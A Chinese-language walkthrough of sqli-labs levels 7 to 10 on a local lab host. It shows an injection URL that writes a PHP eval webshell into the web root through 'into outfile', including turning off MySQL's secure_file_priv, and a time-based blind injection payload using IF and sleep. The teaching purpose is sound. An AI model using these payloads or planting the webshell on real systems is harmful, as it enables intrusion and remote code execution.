Lession-7
这次练习的靶场是sqli-labs第7关,练习mysql的文件写入。我们的目的是将一句话木马写入到网站的Less-7目录下,先来看一下该目录的初始状态
执行SQL写文件操作http://192.168.1.158/sqli-labs/Less-7/?id=1')) union select 1,2,"<?php @eval($_POST['cmd']); ?>" into outfile "c:/phpstudy/www/sqli-labs/Less-7/shell.php"--+
虽然报错,但是我们的一句话木马应该是成功写入到c:/phpstudy/www/sqli-labs/Less-7/shell.php文件中。查看一句话是否写入成功
发现并没有成功写入一句话,这是为什么呢?我们查看一下secure-file-priv参数
secure-file-priv是用来限制LOAD DATA, SELECT … OUTFILE, and LOAD_FILE()传到哪个指定目录的。
secure _file_priv的值为null时,表示mysql不允许导入、导出
当secure_file_priv的值为/tmp/ ,表示mysql只能导入、导出到/tmp/目录下
当secure_file_priv的值没有具体值时,表示不对mysql的导入、导出做限制
上面我们的查询结果中secure_file_priv值为NULL,所以无法写入文件。现在我们来开启它
添加secure_file_priv=后,重启mysql服务即可。此时我们再来写入一句话http://192.168.1.158/sqli-labs/Less-7/?id=1')) union select 1,2,"<?php @eval($_POST['cmd']); ?>" into outfile "c:/phpstudy/www/sqli-labs/Less-7/shell.php"--+
Lession-8
第8关是基于布尔型盲注,如果SQL语句查询成功,则会返回”You are in”;否则返回空。关于这个盲注,我之前已经写过分析文章,可以参考:sqli-lab5(盲注)
Lession-9
第9关是基于时间型盲注,在这一关中,不管SQL语句是否查询成功,都会返回”You are in”,这时候就需要使用到延时盲注了。
在开始之前,我们需要先了解以下mysql中if语句的用法
IF表达式
IF(expr1,expr2,expr3)
如果 expr1 是TRUE,则 IF()的返回值为expr2; 否则返回值则为 expr3。IF() 的返回值为数字值或字符串值,具体情况视其所在语境而定。
IF ELSE 做为流程控制语句使用
if实现条件判断,满足不同条件执行不同的操作,下面来看看mysql 存储过程中的if是如何使用的
mysql实例 IF Else语句的例子
IFNULL(expr1,expr2)
如果expr1 不为 NULL,则 IFNULL() 的返回值为 expr1; 否则其返回值为 expr2。IFNULL()的返回值是数字或是字符串,具体情况取决于其所使用的语境。
Case when语句替代if
在了解了这些基本知识之后,我们使用一下payload来sql注入
http://192.168.1.158/sqli-labs/Less-8/?id=1' and If(ascii(substr(database(),1,1))=115,1,sleep(5))–+
所以我们可以根据服务器给我们返回数据的时间,来判断我们的SQL语句是否查询成功,注入过程和之前的盲注是类似的,这里不再赘述。
Lession-10
第10关只要把前面两关payload部分的单引号改成双引号即可。
参考文章
MySQL的if,case语句使用总结